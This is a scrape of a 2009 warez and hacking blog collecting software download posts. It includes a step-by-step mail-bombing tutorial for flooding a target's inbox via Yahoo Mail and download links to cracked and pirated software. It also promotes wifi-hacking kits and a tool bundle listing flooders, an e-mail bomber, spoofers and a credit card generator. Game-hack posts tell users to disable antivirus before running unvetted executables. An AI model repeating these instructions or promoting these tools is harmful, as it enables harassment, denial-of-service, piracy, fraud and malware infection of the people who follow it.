http://uploading.com/files/OSH3USAV/Invisible

Secrets 4.6 vlick.net .rar.html
Password:
Code:
No Password

2009-09-25T10:37:00.000-07:00

How To Do Mail Bombing

In internet terminology “mail bombing” is referred to an act of sending or forwarding huge amounts of email to a particular person’s mailbox or system. By mail bombing somebody’s mail box, you can actually fill up or overflow or overwhelm the recipient’s mailbox space. It can create great inconvenience to the recipient and cause the recipient’s server to have technical faults such as stop functioning, becoming slow, etc. Many people are of the opinion that mail bombing somebody’s mail box is an unethical behavior and the sender should be hung, quartered and disembowelled.

Having said that, something that is seemingly bad may not necessary be so if used correctly at the right place and the right time. If you know the mail bombing skill, the skill will help you when you are required to send huge amount of email to a particular person. Take this scenario, for instance: if you have quarreled with your girl friend and she insists you write 100 apology letters to her, then you will find this skill extremely useful.

There is a small trick here that tells you how to send out an enormous amount of email to a particular person. It is free and quite easy to use. However, this trick is only workable if you use Yahoo Email Service. We have tested it with Gmail and it is not workable. To initiate this trick, of course you need to register as a user with Yahoo Mail. Login to Yahoo Mail and click “Compose” to write a new email message.

In the “To” field of the new email message, type in the email address of your target recipient. In this case, we use mailbombing@microsoft.com. Copy the same email and paste ten times or MORE (as required). Make sure each address is separated by a comma.

For instance:
To:
mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com

Subsequently, you need to capitalize one letter or a few letters in each email address. You must capitalize different letters or group of letters so that no two addresses are the same.

To:
mailbombing@microsoft.com, mAilbombing@microsoft.com, maIlbombing@microsoft.com, mailBombing@microsoft.com, mailbOmbing@microsoft.com, mailboMbing@microsoft.com, mailbomBing@microsoft.com, mailbombIng@microsoft.com, mailbombiNg@microsoft.com, mailbombinG@microsoft.com

If you send this email out, your target recipient will receive 10 emails from you. As mentioned earlier, this trick is only workable by using Yahoo Mail Service. If you use Gmail Service and duplicate the same,

http://multisoftware-worldwide.blogspot.com
then the recipient will only receive one email and not 10 emails.
If you want to make more email, what you need to do is select the 10 email addresses which you have capitalized and then paste them to another new email. If you duplicate the same process 10 times, the recipient will receive 100 similar emails from you.

This knowledge is not meant for rampant bombing of your friends or colleagues’ mail box. Your Yahoo Account will be terminated if your recipient makes a complaint to Yahoo!

2009-09-25T10:36:00.000-07:00

Windows XP SP3 Final lite 2008 v3.0 Very fast Windows

Click this bar to view the full image.

Windows XP SP3 Final lite 2008 v3.0 | ISo | 177 MB

Very fast Window XP for Super Slow PC

Windows XP SP3 Final lite 2008 v3.0 is built from XP SP3 Final MSDN
HDD need 600mb

reduce : Character Map, MSN Explorer, Internet Games, Old Driver, Tablet PC, Windows Messenger, Security Center, Help and Support, IMAPI CD-Burning COM Service
add : newest hotfix from ******oft ,IE7, WMP11 ,Driver HD UAA Bus
fix registry + add TweakUI
this is version for Slow PC , gamer
9 minutes install
Actived , Fast Run
http://multisoftware-worldwide.blogspot.com

Code:

Code:

http://hotfile.com/dl/13307745/bdd4668/WinXP.SP3Lite.part1.rar.html
http://hotfile.com/dl/13307819/ee3f081/WinXP.SP3Lite.part2.rar.html

2009-09-25T10:33:00.000-07:00

Panda Antivirus Pro 2010 3 Month Genuine License Key Free Download

Panda Antivirus Pro 2010 is comprehensive security software for Windows operating system that protection against viruses, spyware, rootkits, hackers, online fraud and identity theft without compromising the system’s performance.

Panda Antivirus Pro 2010 normally cost $39.95 (aff) for purchase, with trial version normally lasts only 1 month. As part of its marketing promotional offer, the Panda Security and Web of Trust (WOT) are currently jointly offering users 3 months’ free use of Panda Antivirus Pro 2010 with full online update and support. Interest users that intend to trial the Panda Antivirus Pro 2010 can download the free trial via direct download links here.

To get the genuine and legitimate copy of Panda Antivirus Pro 2010 licensed serial key with a 3 months subscription period can head to the following URL:

http://www.mywot.com/en/panda/antiviruspro

Or use direct download links below to download and install the free three months subscription validity Panda Antivirus Pro 2010.

http://multisoftware-worldwide.blogspot.com

Panda Antivirus Pro 2010 with Free 3 Months License Direct Download Links : panda10pro_3.exe

NOTE: Offer expires on September 30, 2009

Panda Antivirus Pro 2010 supports Windows XP 32-bit and Windows Vista 32/64-bit.

2009-09-25T10:32:00.000-07:00

Google Earth 2012 LEAKED!

Google Earth 2012 has been leaked from the google database as of today and has been cracked by

Team CraxrUz

Please enjoy this release and at least post a thank you =)

Download:
Code:
http://www.easy-share.com/1903763831/Google_earth.rar

2009-09-25T10:30:00.000-07:00

McAfee SiteAdvisor Plus Free 6 Months Activation Code

McAfee SiteAdvisor Plus is powerful online security software that provides active, real-time, comprehensive protection from sites that appear in search engine results or during sites visit. McAfee SiteAdvisor protect all kinds of Web-based security threats including spyware, adware, spam, viruses, browser exploits, phishing, online fraud and identity theft. McAfee SiteAdvisor Plus also comes with SiteAdvisor’s safety ratings that help users to stay safe and in control while online. Users can also in protected mode with password-enabled feature that automatically blocks access to dangerous sites. Moreover, McAfee SiteAdvisor also can help identify links in email and instant messages that may point to nefarious web sites and blocks attempts to visit malicious web sites. Furthermore, McAfee SiteAdvisor Plus has added support for Firefox, AOL Instant Messenger and AOL Mail.

Features of McAfee SiteAdvisor Plus:

Helps protect against spyware and adware
Anti-phishing protection
Alerts on potentially malicious web sites and blocks risky websites
Provides safety ratings for search results
Scans email and IMs
Helps to identify nefarious phishing scam sites
Helps guard against exposure to sites hosting potentially intrusive programs, malware, and online scams
Safely shop and bank online
Color-coded threat alerts
Works with other security software
Automatically updates to provide guidance for newly discovered sites

McAfee SiteAdvisor Plus normally costs $24.99 (one PC) for purchase through McAfee Security Store.

http://multisoftware-worldwide.blogspot.com
McAfee SiteAdvisor Plus is available in 15 languages and dialects. As part of promotional offer for eBay customers, interested users intend to trial now can grab the McAfee SiteAdvisor Plus with free 6 months license.

Go to the following promotion page:
http://us.mcafee.com/root/landingpages/affLandPage.asp?affid=663&lpname=saplus&cid=52154
Then click DOWNLOAD NOW button.
Now create a free McAfee account by entering required fields in the form and click “I Agree” button.
Note: Direct login to the account if already created an account with McAfee before.
Check the mailbox, the email from Mcafee will receive with activation link. Click on the activation link.
After account creation you will see payment order conformation page, then click on Go to my account tab.
Download the McAfee SiteAdvisor Plus free 180 days without required license key code.

McA

2009-09-25T10:28:00.000-07:00

Free iolo Search and Recover 5 Download With 1 Year Activation Serial Key

iolo Search and Recover 5 is comprehensive commercial used data recovery software for Windows operating system that provides recover, rescue, quickly locate, and save precious data such documents, photos, email messages, videos, and audio files. The software specifically designed for the recovery of accidentally deleted data. It is able to recover from all popular email programs and major drive types including malfunctioning, damaged, formatted and repartitioned drives and devices.

http://multisoftware-worldwide.blogspot.com
The iolo Search and Recover 5 comes with easy-to-use interface that allows to quickly sorting through irrelevant files to rescue precious data. In addition, iolo Search and Recover has improved recovery algorithms, data imaging, data security function, and expanded file-type and media support for more efficient recovery of specific file types. Other prominent features include Outlook recovery, secure file deletion option, File Terminator, StrongScan technology, and SmartScan technology that can scan and allocate deleted files.

Features of iolo Search and Recover 5:

Finds and recovers deleted or damaged data from all drives and format types
Recovers from all popular e-mail programs including Outlook, Outlook Express, Thunderbird, Netscape Mail and Eudora
Even recovers data from malfunctioning, damaged, formatted, and repartitioned drives and devices
Enhanced preview technology allows to see, hear or read multimedia files before recovering them physically
Turn frustration to triumph in seconds
Convenient TotalRecovery
StrongScan technology finds more lost or deleted files than other recovery products
Upgraded interface enables intuitive operation and fast access to the data
Improved data security function that permanently delete any file or folder
Improved data imaging lets create virtual drives or backup copies from any hard drive, CD or DVD, as well as from damaged or inaccessible media

iolo Search and Recover 5 normally cost $39.95 for a 12-month subscription. As part of promotional offer, anybody now can grab the Search and Recover 5 with free 1-year genuine legitimate activation serial license key.

Go to the promotional page to grab the free 1 year Search and Recover 5 activation key:
http://www.iolo.com/casr
Click “Continue” button to go to next page and click on “Secure Checkout”

Note: You will enter the iolo shopping cart as part of this process, but your credit card will NOT be charged.
Enter the name, email address, and other information, then click “Continue” button.
Now will be forwarded to email delivery method web page where need to click the “Continue” button.
Note: Select Email Delivery which is free as the shipping method receive the iolo Search and Recover 5 license key via email. Postal delivery is not free.
In review your order page, which will show the billing summary and shipping summary. Click on “Place Order” button.
Check the mailbox, the email from iolo technologies will receive with the subject “Thank you for ordering from iolo technologies, #2101XXXXXXX”.
Download and install iolo Search and Recover 5: SearchAndRecover.exe
During Installation select “I own Search and Recover and can enter my serial number later” option, and click”Next” button.
Enter the activation key at the next window to enjoy the fully licensed iolo Search and Recover 5 for 12-month subscription.

iolo Search and Recover 5 supports Windows 2000, Windows XP, and Windows Vista.

2009-09-25T10:27:00.001-07:00

Using iWork as an image editor

I recently noted the image-editing functionality of Preview.app, which can act as a "good enough" image editor for many that don't have access to Photoshop. While it's difficult to argue with the free price tag, Preview is not without its limitations. Fortunately, many of these limitations are unlocked if you happen to own Apple's iWork suite, which in its own right can serve as an image editor for the budget-minded.Read on to see how to use iWork in this unconventional way.

The three components of iWork -- Pages, Keynote and Numbers -- each serve different purposes. Pages is an alternative to Microsoft Word, and Keynote and Numbers can be seen as respective alternatives to Microsoft's PowerPoint and Excel. Despite their respective core competencies, each app has page layout functionality. And this page layout capability serves as canvas of sorts, providing you a space to edit your images. Among these editing features are the ability to add or manipulate:

Text Boxes
Shapes
Shadows
Angle-based image rotation
Reflections
Opacity
Instant Alpha

Although Pages, Keynote and Numbers are separate apps, the image editing functionality within each is nearly identical; in fact, I haven't been able to spot the differences, if indeed they do exist. For the purpose of this demo, I'm going to choose the Page Layout template in Pages. However, if you choose Keynote, you'll want to delete the preset text boxes that will accompany the first slide. Likewise, if you choose Numbers, choose the blank spreadsheet, and then delete the table in the first spreadsheet.

Here I am in Pages's page layout view with a stock photo of Apple's MacBook Pro line taken from Apple's website. I'd like to add some copy to accompany the image. To do this, I'll need to click on the Text Box button on the menu bar; alternatively, I could add text within a shape via the Shapes button.

Perhaps this image would look a bit nicer with a shadow and reflection. To do this, I just need to select the image and enable Shadow and Reflection on the menu bar.

http://multisoftware-worldwide.blogspot.com
But if I want more granular control of shadows and reflections, as well as other attributes (such as image opacity and the angle of the image), I can get to them by clicking on the Inspector button and clicking on the Graphic Inspector pane within it.

That's more like it. I think I'm done.

Like Preview and iPhoto, you can adjust other image attributes (such as saturation, contrast and exposure) via the Adjust Image palette. this is accessible on the menu via View > Adjust Image.

Now that I'm complete with my editing, I'll need to save it as an image. Since selecting Save within Pages, Keynote, or Numbers will result in the image getting saved in the respective native file formats of those apps, I'll need to move this image over to Preview. To do this, select all of the elements in the newly edited picture and click on copy. Then launch Preview and select New from Clipboard from the FIle menu. This will bring all of the elements over to Preview as a flattened image. Alternatively, one can choose to export the document as a PDF, cropping it in Preview, and saving it as your desired image format.

As with many Apple products, the UI plays a major role in making for a more pleasurable experience. This ethos is certainly evident across the iWork suite, resulting in a very similar and seamless workflow within all three apps. Hence, I was able to illustrate the image editing features just using Pages.

By no means is iWork a replacement for Photoshop, Photoshop Elements or Pixelmator. But for the $79 price tag of iWork, you certainly get much more than just an office productivity suite.

2009-09-25T10:26:00.000-07:00

Leaked: BlackBerry Desktop Manager for Mac

Time to rejoice Mac users, today is your day. That is because the BlackBerry Desktop Manager for Mac has just been leaked. It is important to note this is version 1.0.0 and it's still in the beta phase so you may get some bugs.
For years now Mac users have been left out in the cold when it comes to the BlackBerry Desktop Manager. It really does make you wonder what took RIM so long to develop a compatible Mac version. In the long run it may have paid off because of the amount of time they have had to work and perfect it. The BlackBerry Desktop manager for Mac lets you sync your iTunes playlists, contacts, tasks, apps and more.
http://multisoftware-worldwide.blogspot.com
One thing is for sure Mac owners who previously stayed away from BlackBerry because of this might just be changing their mind.

Download BlackBerry Desktop Manager for Mac
Alternate Link

2009-09-25T10:25:00.001-07:00

Manic Time

Manic Time is a free program which automatically logs your computer activity and gives you a breakdown of how you spend your time. It’s not a new idea, we first covered Rescue Time way back in 2007, but this is an interesting take on the subject.
You can tag your activities to make them easier to track, and you get lovely coloured charts to prove that you’re really spending a huge amount of time working and not goofing off on Reddit, so that should please the boss. Arf!
ManicTime has been designed to make it easy for you to find out how you spend your time. You can easily find out how much time you spend behind a computer or how much time you spend browsing the web. It will help you learn which applications you use regularly and which are just collecting dust.
http://multisoftware-worldwide.blogspot.com
Time tagging allows you to see how you spent your time based on your own time tags. So based on your time tags you are able to see for example how much time you spent on a certain project or even a specific feature.

2009-09-25T10:23:00.000-07:00

3 Simple Free Virtual Drive Tools To Mount Disks & Iso Images

ISO stands for the International Organization for Standardization. You wouldn’t know it but it’s one of the most powerful non-governmental organizations in the world. These are the guys who set the universal benchmarks known as ISO standards.
Why are we discussing a world body in a tech site? It’s because they lend their name to a well known file format too.
The ISO file (.iso) is just an archive file format of an optical disk. It can be said to be an exact clone of a file system because it’s a byte for byte copy of a disk with all of its data and metadata. It’s a popular format for downloads and transport over the internet.
http://multisoftware-worldwide.blogspot.com
Anyone who has downloaded a game, anOS like a Linux distro, or an OS update would know them by sight. Also, being an open standard format along with another called UDF it’s supported by all optical disc software.

2009-09-25T10:22:00.000-07:00

Nvidia GeForce 190.40 Driver Leaked

Enabling more fun in the sun for Nvidia card owners, a new GeForce driver has slipped through the Santa Clara Green Goblin’s fingers and made its way online.

http://multisoftware-worldwide.blogspot.com
Sourced by the XFastest crew, the GeForce 190.40 includes the PhysX System Software version 9.09.0428, is dated July 21st (the 190.30 WHQL is signed on July 14), and has support for the GeForce 6, 7, 8, 9, 100, and 200 series graphics cards, as well as the latest IGPs. The leaked and loaded GeForce 190.40 can be downloaded via the following links:

GeForce 190.40 beta (Windows XP 32bit)
GeForce 190.40 beta (Windows XP 64bit)
GeForce 190.40 beta (Windows Vista/7 32bit)
GeForce 190.40 beta (Windows Vista/7 64bit)

2009-09-25T10:21:00.000-07:00

Nokia 5800 Navigation Edition Photo Leaked

Last week there are too many roumers about the Nokia new devices and many of channels published the photos of several unannounced Nokia devices including the Nokia N97.One of those devices was a Nokia 5800-looking device with a silver trim. Many of us guessing that it was a 5900 but its announced as Nokia 5800 Navigation Edition on friday.

The New Nokia 5800 Navigation Edition will comes with some lovely features like guidance software Ovi maps with a lifetime of voice-guided Drive and Walk navigation, in-box car charger and Nokia car kit.5800 Navigator will expected in the third quarter of 2009 for the price of 285 Euros before subsidies.
http://multisoftware-worldwide.blogspot.com
let see whats will come at the end. share your opinion and initiate discussion.

2009-09-25T10:20:00.000-07:00

Wifi Hacks 2009 AIO

http://multisoftware-worldwide.blogspot.com
Thsi object has mass changed tools to hack adn craze wifi so ytou can habit your neighbors internet anbd effect whatever Tools for Windows and Linux further smoe gratifyingly strikingly tools!.

Download Wifi Hacks 2009 AIO (Rapidshare):

http://rapidshare.com/files/262928298/Wifi.Hacks.2009.AIOrequested.7z

Download: Wifi Hacks 2009 AIO

2009-09-25T10:18:00.000-07:00

Net Tools 5.0 : The Ultimate Hacking Kit

Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow’s technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer’s network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable,

http://multisoftware-worldwide.blogspot.com

so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 175+ tools it is a great collection of useful tools for network users. The size of Net Tools 5.0.70 is approximately 25 Mb.

Contents

Net Tools 5.0 (build 70) contains a whole variety of network tools. Here is a list of the most important tools:

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
Trace Route (2 ways)
9) TCP/IP Configuration
10) Online – Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect – Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer’s IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, … All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

Many extra features and utilities are included in this package!

http://rapidshare.com/files/157386904/NetTools5.0.70.part1.rar
http://rapidshare.com/files/157390998/NetTools5.0.70.part2.rar
http://rapidshare.com/files/157393621/NetTools5.0.70.part3.rar
http://rapidshare.com/files/157449570/NetTools5.0.70.part4.rar
http://rapidshare.com/files/157456180/NetTools5.0.70.part5.rar

2009-09-25T10:17:00.001-07:00

Garena Hack 5.7c

Released a new Garena Hack 5.7c.

Garena Hack 5.7c:
- Protection not see running hacks
- Hack is running version 1.23 & 1.24
- No message at the beginning where it is written that your ACC banned ..
- Gold 100 Exp 15 min Basic 50 exp even when you do not play
- No need to wait 5 seconds that would go into the room
- Flooding can be non-stop

Instructions for use:
1) Run the downloaded file in garena.exe folder and log in using your login Garen
2) In the folder with the downloaded Garena Haq Find the file Launch.bat through it we will run!
3) After clicking on Launch.bat blue window will appear where you must select the option for which version Var3 its run or even separately!
4) In this blue box, click 1 and enter, then we test fails, skip it and press any key)
5) Everything is ready:
Go through Launch.bat only the folder.

Size: 13.03 Mb

Download:
http://uploading.com/files/196femca/GH_5.7c.rar/

Mirror:
http://bitroad.net/download/91f940e027dc14...H_5.7c.rar.html

Garena Hack 5.7c Fast Download

Garena Hack 5.7c Alternative Link

2009-09-25T10:14:00.000-07:00

Garena Hack v3.3 | Warcraft 1.24b Maphack

The New Garena Hack 3.3 is released by GarenaHack-er, this version has built in Custom Kick, Diabolic Warcraft 3 Toolkit and Warcraft 1.24b maphack.

http://multisoftware-worldwide.blogspot.com
You can use this Garena Hack with any Garena update. There are no MEGA Exp in this Garena Hack, even the original one doesn't have it. Read the guide and download the Garena Hack v3.3 with Warcraft 1.24b maphack.
Step by Step Guide (for noobs):

• Download GarenaHack_4.04_v3.exe from the link above.

• Install it in your Garena Folder.

• After installing run "GarenaHack" from Desktop. (see icon imge on right)

• A pop-up will appear, just click "YES"

• Now click, "Start Garena Hack v3.3"

• Garena Hack window will pop-up.

• Now click "Start Garena Client - MapHack 1.24b - Custom Kick"

• A pop-up window will appear, click start..

• Another pop-up will appear, but this time you know what to do ^^.

NOTES:
• Run Garena hack by following the steps above, stricly
• GarenaHack.exe and Garena.exe must not be in same directory (it must be in a sub-directory), if you see this, delete the folder, and reinstall Garena & Garenahack.
• There is no MegaEXP in this hack.
• There is no virus in this hack, if your antivirus say anything, just disable it.
• If any Garena update comes, * Update it normally but after the update, when the Garena client is started automatically again, close it, and the click "Start Garena" again from the GarenaHack. If you don't do this probably nothing will happen. But it's best if you do this.

2009-09-25T10:13:00.000-07:00

Hacking VoIP Exposed

Book Description
Sidestep VoIP Catastrophe the Foolproof Hacking Exposed Way

"This book illuminates how remote users can probe, sniff, and modify your phones, phone switches, and networks that offer VoIP services. Most importantly, the authors offer solutions to mitigate the risk of deploying VoIP technologies." --Ron Gula, CTO of Tenable Network Security

Block debilitating VoIP attacks by learning how to look at your network and devices through the eyes of the malicious intruder. Hacking Exposed VoIP shows you, step-by-step, how online criminals perform reconnaissance, gain access, steal data, and penetrate vulnerable systems. All hardware-specific and network-centered security issues are covered alongside detailed countermeasures, in-depth examples, and hands-on implementation techniques. Inside, you'll learn how to defend against the latest DoS, man-in-the-middle, call flooding, eavesdropping, VoIP fuzzing, signaling and audio manipulation, Voice SPAM/SPIT, and voice phishing attacks.

*Find out how hackers footprint, scan, enumerate, and pilfer VoIP networks and hardware
*Fortify Cisco, Avaya, and Asterisk systems
*Prevent DNS poisoning, DHCP exhaustion, and ARP table manipulation
*Thwart number harvesting, call pattern tracking, and conversation eavesdropping
*Measure and maintain VoIP network quality of service and VoIP conversation quality
*Stop DoS and packet flood-based attacks from disrupting SIP proxies and phones
*Counter REGISTER hijacking, INVITE flooding, and BYE call teardown attacks
*Avoid insertion/mixing of malicious audio
*Learn about voice SPAM/SPIT and how to prevent it
*Defend against voice phishing and identity theft scams

About the Author
David Endler is the Director of Security Research for TippingPoint, a division of 3Com. Previously, he performed security research for Xerox Corporation, the NSA, and MIT. Endler is also the chairman and founder of the Voice over IP Security Alliance.

Mark Collier is CTO for SecureLogix Corporation. He is an expert author and frequent presenter on the topic of VoIP security.

http://multisoftware-worldwide.blogspot.com
Collier is also a founding member of the Voice over IP Security Alliance.
Product Details

* Paperback: 539 pages
* Publisher: McGraw-Hill Osborne Media; 1 edition (November 28, 2006)
* Language: English
* ISBN-10: 0072263644
* ISBN-13: 978-0072263640

DOWNLOAD:16,3MB

Download:
Hotfile.com: One click file hosting

2009-09-25T10:12:00.000-07:00

Yahoo Messenger 10.0.0.31 Leaked

Yahoo! Messenger is an advertisement-supported instant messaging client and associated protocol provided by Yahoo!.

http://multisoftware-worldwide.blogspot.com

Yahoo! Messenger is provided free of charge and can be downloaded and used with a generic "Yahoo! ID" which also allows access to other Yahoo! services, such as Yahoo! Mail, where users can be automatically notified when they receive new email. Yahoo! also offers PC-PC, PC-Phone and Phone-to-PC service, file transfers, webcam hosting, text messaging service, and chat rooms in various categories.

Yahoo! Messenger was originally launched under the name Yahoo! Pager on March 9, 1998.[1]

In addition to instant messaging features similar to those offered by ICQ, it also offers (on Microsoft Windows) features such as: IMVironments (customizing the look of Instant Message windows, some of which include authorized themes of famous cartoons such as Garfield or Dilbert), address-book integration and Custom Status Messages.[2] It was also the first major IM client to feature BUZZing and music-status. Another recently added feature is customized avatars.

▼
▼
▼

http://www.mediafire.com/download.php?e9dccwdc1nn

2009-09-25T10:10:00.000-07:00

Fake Webcam 6.1.3

Broadcast pre-recorded videos on instant messengers while chatting

Fake Webcam - it will broadcast just one movie to all the messengers at once.

Stream/play videos and movies on Yahoo, MSN, AOL, Paltalk, ICQ, Camfrog, and on all messengers instead of actual Webcam.

http://multisoftware-worldwide.blogspot.com

It stream videos and movies on your messenger just like an actual webcam.

You don't need to have a webcam for webcamming. Enjoy pretending someone you want to be. Your chat mate will never figure out that it's not a real webcam.

Here are some key features of "Fake Webcam":

· Play pre-recorded videos without even having a physical webcam
· Have a virtual personality
· Keep your privacy by pretending to be some one else
Download from Easy-share

▼
▼
▼

http://www.easy-share.com/1906648135/FW6.1.3_downarchive.info.rar

http://hotfile.com/dl/8136239/c2b91de/FW6.1.3_downarchive.info.rar.html

2009-09-25T10:09:00.000-07:00

Full Speed Internet Broadband Connection v3

ramatically speed up your existing Internet broadband connection and get the best performance possible from your current Internet access.
http://multisoftware-worldwide.blogspot.com
No technical questions; just one click and it’s done. Free Internet speed test software included.. Full Speed will increase your online Internet speed with everything you do: faster downloads, web browsing, data streaming, e-mail. P2P and gaming.

Features:

* Faster Internet access
* Faster download speeds
* Faster web site browsing performance
* Improve Internet and Intranet performance
* Quicker data download times
* Improved streaming music and movies
* Faster download for songs and video
* Faster performance with email
* Better download speed for all data
* Faster loading Web graphics
* Speed test for Web site browsing
* Speed test for general data transfer

Tested over:
1. T1, T3, Cable, DSL - SDSL, ADSL
2. VPN and direct wired WAN/LAN
3. P2P, Remote Desktop, File Sharing Software

▼
▼
▼

http://rapidshare.com/files/255235160/Full_Speed_Internet_Broadband_Connection_v3.rar

2009-09-25T10:07:00.000-07:00

WinRAR Password Remover 2.0

Advanced RAR Password Recovery is an application that helps you to recover forgotten passwords for RAR/WinRAR files.
http://multisoftware-worldwide.blogspot.com
We’ve all had the experience of not using a file for a while and then forgetting the password. This problem is solved with Advanced RAR Password Recovery. With it you don’t need to keep a record of your passwords; if you forget one, you just operate the program and find.

▼
▼
▼

http://uploading.com/files/Y7VNGA9L/Rar_password_Remover_Priv8.rar.html

http://hotfile.com/dl/8797510/3a1d99c/Rar_password_Remover_by_onel0ve.rar.html

2009-09-25T10:03:00.000-07:00

How to Compile C Programs

In many of my previous posts especially in the VIRUS CREATION section, I have used C as the programming language. If you’re new to C programming and find it difficult to compile the C source codes then this post is for you.

http://multisoftware-worldwide.blogspot.com

Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.

How to install Borland C++ compiler

1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.

http://www.codegear.com/downloads/free/cppbuilder

2. After you download, run freecommandlinetools.exe. The default installation path would be

C:\Borland\BCC55

How to configure Borland C++ compiler

1. After you install Borland C++ compier, create two new Text Documents

2. Open the first New Text Document.txt file and add the following two lines into it

-I”c:\Borland\Bcc55\include”

-L”c:\Borland\Bcc55\lib”

Save changes and close the file. Now rename the file from New Text Document.txt to bcc32.cfg.

3. Open the second New Text Document (2).txt file and add the following line into it

-L”c:\Borland\Bcc55\lib”

Save changes and close the file. Now rename the file from New Text Document (2).txt to ilink32.cfg.

4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Bin and paste them.

How to compile the C source code (.C files)

1. You need to place the .C (example.c) file to be compiled in the following location

